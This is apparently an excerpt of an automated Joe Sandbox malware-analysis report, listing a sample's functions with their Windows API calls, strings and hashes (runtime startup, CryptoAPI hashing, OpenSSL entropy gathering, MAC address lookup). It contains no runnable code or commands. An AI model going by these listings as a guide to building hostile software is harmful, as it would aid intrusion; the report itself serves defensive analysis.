Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798

Function 004240F6 Relevance: 7.5, APIs: 5, Instructions: 46
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__wsetenvp.LIBCMT ref: 0042404A
__amsg_exit.LIBCMT ref: 00424055
__cinit.LIBCMT ref: 0042405D
__amsg_exit.LIBCMT ref: 00424068
__wwincmdln.LIBCMT ref: 0042406E

Part of subcall function 00427CEC: _doexit.LIBCMT ref: 00427CF6

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: __amsg_exit$__cinit__wsetenvp__wwincmdln_doexit
String ID:
API String ID: 2587630013-0
Opcode ID: 09217920513a334b6f79b9e541313f96d920471f94f8c93875b1f7a29f43a62f
Instruction ID: 7082b750ddc29103f3c984cb6fc30cb2f1280ee8f42cb5262a6b676f22e3f134
Opcode Fuzzy Hash: 09217920513a334b6f79b9e541313f96d920471f94f8c93875b1f7a29f43a62f
Instruction Fuzzy Hash: F6F0F460709331A9DA3173B37A12B5F1654DF81768FE0054FF600A61C3DE9C8981856E

Function 00427B0B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 7
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___crtCorExitProcess.LIBCMT ref: 00427B11

Part of subcall function 00427AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,i;B,00427B16,i;B,?,00428BCA,000000FF,0000001E,00507BD0,00000008,00428B0E,i;B,i;B), ref: 00427AE6
Part of subcall function 00427AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00427AF8

ExitProcess.KERNEL32 ref: 00427B1A

Strings

i;B, xrefs: 00427B0E

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID: i;B
API String ID: 2427264223-472376889
Opcode ID: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
Instruction ID: 59367741208a4d0b8125be5957acfda0e57e61d39344a7bf1a3f5abf2379cf84
Opcode Fuzzy Hash: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
Instruction Fuzzy Hash: 0DB09230404108BBCB052F52EC0A85D3F29EB003A0B408026F90848031EBB2AA919AC8

Function 0042FB64 Relevance: 3.0, APIs: 2, Instructions: 17
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 0042FB7B

Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22

__tzset_nolock.LIBCMT ref: 0042FB8E

Part of subcall function 0042FE47: __lock.LIBCMT ref: 0042FE6C
Part of subcall function 0042FE47: ____lc_codepage_func.LIBCMT ref: 0042FEB3
Part of subcall function 0042FE47: __getenv_helper_nolock.LIBCMT ref: 0042FED4
Part of subcall function 0042FE47: _free.LIBCMT ref: 0042FF07
Part of subcall function 0042FE47: _strlen.LIBCMT ref: 0042FF0E
Part of subcall function 0042FE47: __malloc_crt.LIBCMT ref: 0042FF15

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: __lock$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
String ID:
API String ID: 1282695788-0
Opcode ID: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
Instruction ID: e2ddc43a93f61bf79f0790849a809cb79cc8f4f227a559e0d4967367be19fad2
Opcode Fuzzy Hash: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
Instruction Fuzzy Hash: 69E0BF35E41664DAD620A7A2F91B75C7570AB14329FD0D16F9110111D28EBC15C8DA2E

Function 00427F3D Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_doexit.LIBCMT ref: 00427F47

Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
Part of subcall function 00427E0E: DecodePointer.KERNEL32(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$Encode$__lock_doexit
String ID:
API String ID: 2158581194-0
Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
Instruction ID: a7e7560d2adc556c6fb323ffd13f600db444db9a7111c1ec19eeb8b3048b151f
Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
Instruction Fuzzy Hash: ABB01271A8430C33DA113642FC03F053B0C4740B54F610071FA0C2C5E1A593B96040DD

Non-executed Functions

Function 00481920 Relevance: 121.3, APIs: 41, Strings: 28, Instructions: 587libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(00000094), ref: 00481983
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00481994
LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004819A1
LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 004819AE
GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 004819E8
GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 004819FB
FreeLibrary.KERNEL32(?), ref: 00481AC5
GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00481ADB
GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00481AEE
GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00481B01
FreeLibrary.KERNEL32(?), ref: 00481C15
LoadLibraryA.KERNEL32(USER32.DLL), ref: 00481C36
GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00481C50
GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00481C63
GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00481C76
FreeLibrary.KERNEL32(?), ref: 00481D45
GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00481D73
GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00481D86
GetProcAddress.KERNEL32(?,Heap32First), ref: 00481D99
GetProcAddress.KERNEL32(?,Heap32Next), ref: 00481DAC
GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00481DBF
GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00481DD2
GetProcAddress.KERNEL32(?,Process32First), ref: 00481DE5
GetProcAddress.KERNEL32(?,Process32Next), ref: 00481DF8
GetProcAddress.KERNEL32(?,Thread32First), ref: 00481E0B
GetProcAddress.KERNEL32(?,Thread32Next), ref: 00481E1E
GetProcAddress.KERNEL32(?,Module32First), ref: 00481E31
GetProcAddress.KERNEL32(?,Module32Next), ref: 00481E44
GetTickCount.KERNEL32 ref: 00481F03
GetTickCount.KERNEL32 ref: 00481FF1
GetTickCount.KERNEL32 ref: 00482066
GetTickCount.KERNEL32 ref: 00482095
GetTickCount.KERNEL32 ref: 004820FB
GetTickCount.KERNEL32 ref: 00482118
GetTickCount.KERNEL32 ref: 00482187
GetTickCount.KERNEL32 ref: 004821A4

Strings

Process32Next, xrefs: 00481DED
Intel Hardware Cryptographic Service Provider, xrefs: 00481B9C
USER32.DLL, xrefs: 00481C31
Heap32First, xrefs: 00481D8E
Thread32Next, xrefs: 00481E13
KERNEL32.DLL, xrefs: 0048199C
CreateToolhelp32Snapshot, xrefs: 00481D67
CryptGenRandom, xrefs: 00481AE3
LanmanWorkstation, xrefs: 00481A26
Module32First, xrefs: 00481E26
GetQueueStatus, xrefs: 00481C6B
ADVAPI32.DLL, xrefs: 00481989
CryptAcquireContextW, xrefs: 00481AD5
Heap32ListNext, xrefs: 00481DC7
NetStatisticsGet, xrefs: 004819E2
CloseToolhelp32Snapshot, xrefs: 00481D7B
$, xrefs: 00481F7E
GetForegroundWindow, xrefs: 00481C4A
Heap32ListFirst, xrefs: 00481DB4
GetCursorInfo, xrefs: 00481C58
NETAPI32.DLL, xrefs: 004819A9
CryptReleaseContext, xrefs: 00481AF6
Process32First, xrefs: 00481DDA
NetApiBufferFree, xrefs: 004819F0
Thread32First, xrefs: 00481E00
Module32Next, xrefs: 00481E39
Heap32Next, xrefs: 00481DA1
LanmanServer, xrefs: 00481A74

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: AddressProc$CountTick$Library$Load$Free$Version
String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
API String ID: 842291066-1723836103
Opcode ID: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
Instruction ID: 1a290f2a1335d0d3a86819d1d60d6f49a84e0195e1de194fff26f42f4ca9d5b3
Opcode Fuzzy Hash: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
Instruction Fuzzy Hash: 683273B0E002299ADB61AF64CC45B9EB6B9FF45704F0045EBE60CE6151EB788E84CF5D

Function 00410FC0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 149encryptionstringCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
__CxxThrowException@8.LIBCMT ref: 00411026

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
__CxxThrowException@8.LIBCMT ref: 00411051
lstrlenA.KERNEL32(?,00000000), ref: 00411059
CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
__CxxThrowException@8.LIBCMT ref: 0041107A
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
__CxxThrowException@8.LIBCMT ref: 004110AB
_memset.LIBCMT ref: 004110CA
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
__CxxThrowException@8.LIBCMT ref: 004110F0
_malloc.LIBCMT ref: 00411100
_memset.LIBCMT ref: 0041110B
_sprintf.LIBCMT ref: 0041112E
lstrcatA.KERNEL32(?,?), ref: 0041113C
CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F

Strings

%.2X, xrefs: 00411128

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
String ID: %.2X
API String ID: 2451520719-213608013
Opcode ID: 6f04bcb1d5af6720d81330ba6d25d2fff10d0e34b425382de5d36dfe67944e00
Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
Opcode Fuzzy Hash: 6f04bcb1d5af6720d81330ba6d25d2fff10d0e34b425382de5d36dfe67944e00
Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9

Function 00411900 Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 95stringmemorywindowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00411915
FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
lstrcpyW.KERNEL32(00000000,?), ref: 00411962
lstrcatW.KERNEL32(00000000, failed with error ), ref: 00411974
lstrcatW.KERNEL32(00000000,?), ref: 0041198B
lstrcatW.KERNEL32(00000000,00500260), ref: 00411993
lstrcatW.KERNEL32(00000000,?), ref: 00411999
lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
_memset.LIBCMT ref: 004119B8
lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC

Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9

LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04

Strings

failed with error , xrefs: 0041196E

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
String ID: failed with error
API String ID: 4182478520-946485432
Opcode ID: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
Instruction ID: 1677776e610180b78075291f83559cfdcc99dc463041ebd32873df59a21ecb07
Opcode Fuzzy Hash: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
Instruction Fuzzy Hash: 0021FB31A40214B7D7516B929C85FAE3A38EF45B11F100025FB09B61D0DE741D419BED

Function 0040F730 Relevance: 29.2, APIs: 19, Instructions: 732COMMON

Download Yara Rule

APIs

Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE

PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF), ref: 0040F900
_memmove.LIBCMT ref: 0040F9EA
PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0040FA51
_memmove.LIBCMT ref: 0040FADA

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Message$FileFindNamePathPeek_memmove$Dispatch
String ID:
API String ID: 273148273-0
Opcode ID: 9523524d8d3b45d9081d0fccdbbe5b8ea63895c3f5938442575e5094c992c0b6
Instruction ID: a2fe25dd57492d494e78aebb36a96054b80ce25314fb01b08d1ce03a62da89f0
Opcode Fuzzy Hash: 9523524d8d3b45d9081d0fccdbbe5b8ea63895c3f5938442575e5094c992c0b6
Instruction Fuzzy Hash: D652A271D00208DBDF20DFA4D985BDEB7B4BF05308F10817AE419B7291D779AA89CB99

Function 0040E870 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 165encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
__CxxThrowException@8.LIBCMT ref: 0040E8E4

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
__CxxThrowException@8.LIBCMT ref: 0040E90F
CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
__CxxThrowException@8.LIBCMT ref: 0040E93E
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
__CxxThrowException@8.LIBCMT ref: 0040E96F
_memset.LIBCMT ref: 0040E98E
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
__CxxThrowException@8.LIBCMT ref: 0040E9B4
_sprintf.LIBCMT ref: 0040E9D3

Strings

%.2X, xrefs: 0040E9CD

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
String ID: %.2X
API String ID: 1084002244-213608013
Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
Instruction ID: 6020eefb82f776eec2353dc0ff897aa1862dcd4ecc30860888fbdadc8ba65bc1
Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
Instruction Fuzzy Hash: 835173B1E40209EBDF11DFA2DC46FEEBB78EB04704F10452AF501B61C1D7796A158BA9

Function 0040EAA0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 159encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000), ref: 0040EB01
__CxxThrowException@8.LIBCMT ref: 0040EB17

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
__CxxThrowException@8.LIBCMT ref: 0040EB42
CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 0040EB4E
__CxxThrowException@8.LIBCMT ref: 0040EB64
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 0040EB83
__CxxThrowException@8.LIBCMT ref: 0040EB95
_memset.LIBCMT ref: 0040EBB4
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
__CxxThrowException@8.LIBCMT ref: 0040EBDA
_sprintf.LIBCMT ref: 0040EBF4
CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F

Strings

%.2X, xrefs: 0040EBEE

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
String ID: %.2X
API String ID: 1637485200-213608013
Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8

Function 004822E0 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 127windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004549A0: GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
Part of subcall function 004549A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
Part of subcall function 004549A0: GetDesktopWindow.USER32 ref: 004549FB
Part of subcall function 004549A0: GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
Part of subcall function 004549A0: GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
Part of subcall function 004549A0: _wcsstr.LIBCMT ref: 00454A8A

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00482316
CreateCompatibleDC.GDI32(00000000), ref: 00482323
GetDeviceCaps.GDI32(00000000,00000008), ref: 00482338
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00482341
CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 0048234E
SelectObject.GDI32(00000000,00000000), ref: 0048235C
GetObjectA.GDI32(00000000,00000018,?), ref: 0048236E
BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004823CA
GetBitmapBits.GDI32(?,?,00000000), ref: 004823D6
SelectObject.GDI32(?,?), ref: 00482436
DeleteObject.GDI32(00000000), ref: 0048243D
DeleteDC.GDI32(?), ref: 0048244A
DeleteDC.GDI32(?), ref: 00482450

Strings

.\crypto\rand\rand_win.c, xrefs: 00482383
DISPLAY, xrefs: 00482311

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
String ID: .\crypto\rand\rand_win.c$DISPLAY
API String ID: 151064509-1805842116
Opcode ID: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
Instruction ID: 00d76d2b57e2ae43ffa0e146b327d2d4306243c0a97269805a4caa25bb15a565
Opcode Fuzzy Hash: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
Instruction Fuzzy Hash: 0441BB71944300EBD3105BB6DC86F6FBBF8FF85B14F00052EFA54962A1E77598008B6A

Function 0040E670 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 78COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0040E67F

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00550000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

_malloc.LIBCMT ref: 0040E68B
_wprintf.LIBCMT ref: 0040E69E
_free.LIBCMT ref: 0040E6A4

Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13

GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
_free.LIBCMT ref: 0040E6C5
_malloc.LIBCMT ref: 0040E6CD
GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
_sprintf.LIBCMT ref: 0040E720
_wprintf.LIBCMT ref: 0040E732
_wprintf.LIBCMT ref: 0040E73C
_free.LIBCMT ref: 0040E745

Strings

Address: %s, mac: %s, xrefs: 0040E72D
%02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
API String ID: 3901070236-1604013687
Opcode ID: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
Opcode Fuzzy Hash: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9

Function 00410160 Relevance: 26.2, APIs: 17, Instructions: 660COMMON

Download Yara Rule

APIs

Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE

PathFindFileNameW.SHLWAPI(?,?,00000000), ref: 00410346
_memmove.LIBCMT ref: 00410427
PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0041048E
_memmove.LIBCMT ref: 00410514

Memory Dump Source

